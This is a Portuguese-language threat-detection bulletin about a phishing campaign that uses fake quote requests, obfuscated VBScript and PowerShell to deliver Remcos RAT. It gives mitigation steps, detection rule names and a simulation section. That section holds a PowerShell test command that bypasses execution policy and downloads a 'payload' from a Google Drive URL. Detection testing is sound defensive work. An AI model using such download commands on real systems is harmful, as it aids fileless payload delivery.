E-mails Falsos de Pedidos de Cotação Usados em Ataques de Phishing com Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Agentes de ameaça estão distribuindo e-mails de phishing disfarçados como solicitações de cotações de projetos para entregar cargas maliciosas. A campanha usa VBScript para ocultar comandos PowerShell, que por fim recuperam uma carga útil em várias etapas e o Remcos RAT. O malware final suporta execução remota de comandos, registro de teclas e exfiltração de dados de sistemas comprometidos.
Investigação
O AhnLab Security Intelligence Center (ASEC) identificou uma campanha de phishing onde arquivos comprimidos contêm VBScripts ocultos. Pesquisadores descobriram um método de ofuscação que abusa do notepad.exe para reconstruir o nome do executável ‘powershell’ e utiliza substituição de strings baseada em tokens para comandos PowerShell. A carga útil em várias etapas também aproveita objetos COM para realizar o bypass de UAC.
Mitigação
Os usuários devem validar o domínio de e-mail do remetente e permanecer cautelosos ao abrir anexos ou hyperlinks inesperados. Organizações devem configurar filtragem de e-mail para bloquear extensões de arquivo suspeitas, como .vbs, .exe e .js. Os usuários também devem evitar inserir credenciais sensíveis em URLs não oficiais ou suspeitas recebidas por meio de e-mails não solicitados.
Resposta
Quando atividade maliciosa é detectada, verifique a legitimidade do e-mail original e investigue atividades de arquivo suspeitas dentro de %APPDATA%. Verifique a execução não autorizada de PowerShell e indicadores associados com o Remcos RAT. Isole sistemas comprometidos da rede para prevenir comunicação C2 adicional, atividade lateral e exfiltração de dados potencial.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
LOLBAS WScript / CScript (via process_creation)
Possível Infiltração / Exfiltração / C2 de Dados via Serviços / Ferramentas de Terceiros (via dns_query)
Possível Infiltração / Exfiltração / C2 de Dados via Serviços / Ferramentas de Terceiros (via dns)
IOCs (HashMd5) para detectar: Malware Phishing/Scam: Cuidado com e-mails de phishing disfarçados como solicitações de cotações
IOCs (SourceIP) para detectar: Malware Phishing/Scam: Cuidado com e-mails de phishing disfarçados como solicitações de cotações
IOCs (DestinationIP) para detectar: Malware Phishing/Scam: Cuidado com e-mails de phishing disfarçados como solicitações de cotações
Detectar Script PowerShell Conectando ao Servidor C2 [Conexão de Rede do Windows]
Execução Maliciosa de PowerShell via Ofuscação VBScript [Windows Powershell]
Execução de Simulação
-
Narrativa & Comandos do Ataque: Um atacante envia um e-mail de spearphishing contendo um link para um documento. Quando o usuário clica no link, é executado um comando PowerShell oculto projetado para extrair um script malicioso de um repositório do Google Drive. O atacante usa o
export=downloadparâmetro para garantir que o arquivo seja baixado diretamente em vez de ser visualizado em um navegador. O objetivo é executar uma carga útil sem arquivo na memória para evadir antivírus baseado em disco. O comando é construído para acionar a regra de detecção específica direcionada a esse padrão de download. -
Script de Teste de Regressão:
# Simulação de download de arquivo do PowerShell de um Google Drive via padrão específico de URL $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J" Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Downloading payload...'; $data = Invoke-WebRequest -Uri '$targetUrl';`"" -
Comandos de Limpeza:
# Nenhum arquivo é escrito no disco nesta simulação específica, # mas interrompemos o processo se ainda estiver em execução. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue